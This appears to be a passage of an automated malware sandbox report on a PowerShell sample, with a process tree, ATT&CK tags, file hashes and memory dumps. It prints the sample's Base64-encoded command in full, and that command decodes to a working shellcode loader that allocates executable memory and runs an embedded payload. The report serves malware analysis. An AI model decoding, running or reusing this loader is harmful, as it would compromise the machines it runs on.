aABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAawB0AGMAVQAgACQASQA5AE0AOQAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABJADkATQA5ACAAJABlACIAOwB9AA==
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3048
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JABQAHkAeAAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFAAeQB4ACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAAxADkALAAwAHgAYQBiACwAMAB4AGEAOAAsADAAeABhAGMALAAwAHgAZAA5ACwAMAB4AGUAZQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBhACwAMAB4ADIAYgAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAAzADEALAAwAHgANwAyACwAMAB4ADEAMgAsADAAeAAwADMALAAwAHgANwAyACwAMAB4ADEAMgAsADAAeAA4ADMALAAwAHgAZgAzACwAMAB4ADUANwAsADAAeAA0AGEALAAwAHgANQA5ACwAMAB4AGYAZgAsADAAeAA0ADAALAAwAHgAMAA0ACwAMAB4AGEAMgAsADAAeABmAGYALAAwAHgAOQAwACwAMAB4ADcAYgAsADAAeAA5ADIALAAwAHgAMgBkACwAMAB4AGYANAAsADAAeABmADAALAAwAHgAOAA2ACwAMAB4AGUAMQAsADAAeAA3AGMALAAwAHgAZQAzACwAMAB4AGEAYwAsADAAeAA1ADMALAAwAHgANwAzACwAMAB4ADYANwAsADAAeABlADAALAAwAHgANAA3ACwAMAB4ADAAMAAsADAAeAAwADUALAAwAHgAMgBkACwAMAB4ADUANgAsADAAeABlADkALAAwAHgAZQA1ACwAMAB4ADkAYQAsADAAeABkADIALAAwAHgAMwAzACwAMAB4AGMAYgAsADAAeAAyADQALAAwAHgANABlACwAMAB4ADAANwAsADAAeAA0AGEALAAwAHgAZAA5ACwAMAB4ADgAYwAsADAAeAA1ADQALAAwAHgAYQBjACwAMAB4AGUAMAAsADAAeAA1AGYALAAwAHgAYQA5ACwAMAB4AGEAZAAsADAAeAAyADUALAAwAHgAMQA2ACwAMAB4AGMANwAsADAAeAA0ADIALAAwAHgAZgBiACwAMAB4AGYAZgAsADAAeABhAGMALAAwAHgAYwBmACwAMAB4AGUAYwAsADAAeAA3ADQALAAwAHgAZgAwACwAMAB4AGQAMwAsADAAeAAwAGQALAAwAHgANQBhACwAMAB4ADcAZQAsADAAeAA2AGIALAAwAHgANwA2ACwAMAB4AGQAZgAsADAAeAA0ADEALAAwAHgAMQA4ACwAMAB4AGMAYQAsADAAeABkAGUALAAwAHgAOQAxACwAMAB4AGIAMQAsADAAeAA1ADkALAAwAHgAYQA4ACwAMAB4ADAAOQAsADAAeABiADkALAAwAHgAMAA2ACwAMAB4ADAAOAAsADAAeAAyAGIALAAwAHgANgBlACwAMAB4ADMAMwAsADAAeAA4ADEALAAwAHgANQBmACwAMAB4AGEAYwAsADAAeAAwAGQALAAwAHgAZQBlACwAMAB4AGUAOQAsADAAeAA0ADcALAAwAHgANQA5ACwAMAB4ADkAYgAsADAAeABlAGIALAAwAHgAOAAxACwAMAB4ADkAMwAsADAAeAA1AGIALAAwAHgAMgBhACwAMAB4AGUAMgAsADAAeABkADkALAAwAHgAZgA3ACwAMAB4AGEAYwAsADAAeAAzAGEALAAwAHgAZAA5ACwAMAB4AGUANwAsADAAeABkAGEALAAwAHgAMwAwACwAMAB4ADEAOQAsADAAeAA5AGEALAAwAHgAZABjACwAMAB4ADgAMgAsADAAeAA2ADMALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeAAxADUALAAwAHgAYwAzACwAMAB4ADAAMwAsADAAeABjAGEALAAwAHgAZgAxACwAMAB4AGYANQAsADAAeABjADAALAAwAHgAOABkACwAMAB4ADcAMgAsADAAeABmADkALAAwAHgAYQBkACwAMAB4AGQAYQAsADAAeABkAGQALAAwAHgAMQBlACwAMAB4ADMAMAAsADAAeAAwAGUALAAwAHgANQA2ACwAMAB4ADEAYQAsADAAeABiADkALAAwAHgAYgAxACwAMAB4AGIAOQAsADAAeABhAGEALAAwAHgAZgA5ACwAMAB4ADkANQAsADAAeAAxAGQALAAwAHgAZgA2ACwAMAB4ADUAYQAsADAAeABiADcALAAwAHgAMAA0ACwAMAB4ADUAMgAsADAAeAAwAGQALAAwAHgAYwA4ACwAMAB4ADUANwAsADAAeAAzAGEALAAwAHgAZgAyACwAMAB4ADYAYwAsADAAeAAxADMALAAwAHgAYQA5ACwAMAB4AGUANQAsADAAeAAxADEALAAwAHgAZABjACwAMAB4ADMAMQAsADAAeAAwAGEALAAwAHgANABjACwAMAB4ADQAYgAsADAAeABmAGQALAAwAHgAYwA2ACwAMAB4ADYAZgAsADAAeAA4AGIALAAwAHgANgA5ACwAMAB4ADUAMQAsADAAeAAwADMALAAwAHgAYgA5ACwAMAB4ADMANgAsADAAeABjADkALAAwAHgAOABiACwAMAB4AGYAMQAsADAAeABiAGYALAAwAHgAZAA3ACwAMAB4ADQAYwAsADAAeAA4ADMALAAwAHgAYQA4ACwAMAB4AGUAOAAsADAAeAA4ADMALAAwAHgAMgBiACwAMAB4AGIAOAAsADAAeAAxADcALAAwAHgAMgA0ACwAMAB4ADQAYwAsADAAeAA5ADAALAAwAHgAZAAzACwAMAB4ADcAMAAsADAAeAAxAGMALAAwAHgAOABhACwAMAB4AGYAMgAsADAAeABmADgALAAwAHgAZgA3ACwAMAB4ADQAYQAsADAAeABmAGIALAAwAHgAMgBjACwAMAB4ADYAZAAsADAAeAA0ADEALAAwAHgANgBiACwAMAB4ADAAZgAsADAAeABkAGEALAAwAHgAZQAxACwAMAB4AGUAYQAsADAAeABlADcALAAwAHgAMQA5ACwAMAB4ADAAYQAsADAAeABlADgALAAwAHgAYQAwACwAMAB4ADkANAAsADAAeABlAGMALAAwAHgAYQAwACwAMAB4ADEAZQAsADAAeABmADcALAAwAHgAYQAwACwAMAB4ADAAMAAsADAAeABjAGYALAAwAHgAYgA3ACwAMAB4ADEAMAAsADAAeABlADgALAAwAHgAMAA1ACwAMAB4ADMAOAAsADAAeAA0AGUALAAwAHgAMAA4ACwAMAB4ADIANgAsADAAeAA5ADIALAAwAHgAZQA3ACwAMAB4AGEAMgAsADAAeABjADkALAAwAHgANABiACwAMAB4ADUAZgAsADAAeAA1AGEALAAwAHgANwAzACwAMAB4AGQANgAsADAAeAAyAGIALAAwAHgAZgBiACwAMAB4ADcAYwAsADAAeABjAGMALAAwAHgANQAxACwAMAB4ADMAYgAsADAAeABmADYALAAwAHgAZQAzACwAMAB4AGEANgAsADAAeABmADUALAAwAHgAZgBmACwAMAB4ADgAZQAsADAAeABiADQALAAwAHgANgAxACwAMAB4AGYAMAAsADAAeABjADQALAAwAHgAZQA3ACwAMAB4ADIANwAsADAAeAAwAGYALAAwAHgAZgAzACwAMAB4ADgAMgAsADAAeABjADcALAAwAHgAOAA1ACwAMAB4AGYAOAAsADAAeAAwADQALAAwAHgAOQAwACwAMAB4ADMAMQAsADAAeAAwADMALAAwAHgANwAwACwAMAB4AGQANgAsADAAeAA5AGQALAAwAHgAZgBjACwAMAB4ADUANwAsADAAeAA2AGQALAAwAHgAMQA3ACwAMAB4ADYAOQAsADAAeAAxADgALAAwAHgAMQA5ACwAMAB4ADUAOAAsADAAeAA3AGQALAAwAHgAOQA4ACwAMAB4AGQAOQAsADAAeAAwAGUALAAwAHgAMQA3ACwAMAB4ADkAOAAsADAAeABiADEALAAwAHgAZgA2ACwAMAB4ADQAMwAsADAAeABjAGIALAAwAHgAYQA0ACwAMAB4AGYAOAAsADAAeAA1ADkALAAwAHgANwBmACwAMAB4ADcANQAsADAAeAA2AGQALAAwAHgANgAyACwAMAB4AGQANgAsADAAeAAyAGEALAAwAHgAMgA2ACwAMAB4ADAAYQAsADAAeABkADQALAAwAHgAMQA1ACwAMAB4ADAAMAAsADAAeAA5ADUALAAwAHgAMgA3ACwAMAB4ADcAMAAsADAAeAA5ADAALAAwAHgAZQA5ACwAMAB4AGYAMQAsADAAeABiAGMALAAwAHgAZQA2ACwAMAB4ADAAMwAsADAAeABjADIAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAGQATwBIAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABkAE8ASAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAZABPAEgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2584
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i4es6ow6.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2592
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES142D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC142C.tmp"
        6⤵
        
        PID:2672

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES142D.tmp

Filesize
1KB

MD5
ccdf7db87fb98a829ce809ab1a8d7cff

SHA1
36352686766d36ac18f216245ae5d6c9d94fc4f7

SHA256
fe1189b9a2310710f8d72303b874def5113253233b3ee4c27a52f36f90295190

SHA512
ff678d923baa7238b8c9eca5db5d6b6b0b78b48ee9a09b9586793efaa8d1375649df3d42a18791afa9046e749e4bc75adbc011e479fe78730b57486e96ca3527

Download Submit
C:\Users\Admin\AppData\Local\Temp\i4es6ow6.dll

Filesize
3KB

MD5
1a4272232dd9d95ec83d0b54154eda6d

SHA1
67e11388b363d2b1148c1dee3887d702b135f558

SHA256
769f6e6160c95e7950b247dd0b902e9e1a3fdf0fb51d5ca47205a393bb110823

SHA512
bdf11f024104041196684d0ad51b0240c1a31c7d670ce2583651009c394c0e981633d2975589eb60e8fba371a7fd5d0df13bf2f141e181c5a6f363acb245cedd

Download Submit
C:\Users\Admin\AppData\Local\Temp\i4es6ow6.pdb

Filesize
7KB

MD5
3dd00aa00a39029e37b178445d6eb69f

SHA1
082960a5d887ea1547194c2ca53911601f3c8411

SHA256
498fe8706ba781296e86532f786f4e76262795531a789d64a57cd0938da353fa

SHA512
e15b4d6a93da74866ecf377a4bea1ef004f244fa22543633683e851138fcf8691beddecf9b9696d898d0ac39271607f9fc18613d167e9f355f001c11e0aa8e8f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
9db305db7c86664669f95fc653bc1999

SHA1
34dfe6b0cbdab397796e1df46a36c3667575cffa

SHA256
caaca6a90d57aa54e0fcc5c3e33026cc468079b71fa69a8f37f44056e3e4d9a9

SHA512
02e09a9cb9b742f475e22204e2d64cda37967a843179c441d327ad15ae856d71fa77b67bd9fbacdda1f40899cda763f856e5e62c2c9efda50da6dbdc976d141f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC142C.tmp

Filesize
652B

MD5
368fcd34ae10040f74a472a90ecf7b06

SHA1
726edb32727095fe4713d2dcc9b4cc78dab40655

SHA256
4119f6db05ce0c706d0eeff14bade0bb6df61f010cca89a24302a9f287d3bde4

SHA512
5b35d125d85a10e648205595bba0324c0218a2ea2bc076a9ae4012af3fa97f86722d936d15e500c362ffbd900aa212539c46f70de6f22295b12c155ee97ba6de

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\i4es6ow6.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\i4es6ow6.cmdline

Filesize
309B

MD5
7f51f8377bdf2738e36092859da55930

SHA1
d47bb97f54303b5fda3987d1cec5bb93cefe2096

SHA256
cc2665b036c88aa7379c38a4df69512b777a9ec5fb46dc71496045439b16c833

SHA512
ecd7c39cd86d838574e89af08f3022e6e1f81501ec63222542530f6c6d52835f2d217c5f37aefe79e7f8c8065009f618e82e3f84fc41a3c8d1c6e0161f1bfbad

Download Submit
memory/1956-15-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

Filesize
9.6MB

Download
memory/1956-14-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

Filesize
9.6MB

Download
memory/1956-8-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

Filesize
9.6MB

Download
memory/1956-7-0x0000000002390000-0x0000000002398000-memory.dmp

Filesize
32KB

Download
memory/1956-6-0x000000001B610000-0x000000001B8F2000-memory.dmp

Filesize
2.9MB

Download
memory/1956-5-0x000007FEF534E000-0x000007FEF534F000-memory.dmp

Filesize
4KB

Download
memory/1956-34-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

Filesize
9.6MB

Download
memory/2392-0-0x000000013F580000-0x000000013F5A3000-memory.dmp

Filesize
140KB

Download
memory/2584-33-0x0000000002C30000-0x0000000002C31000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads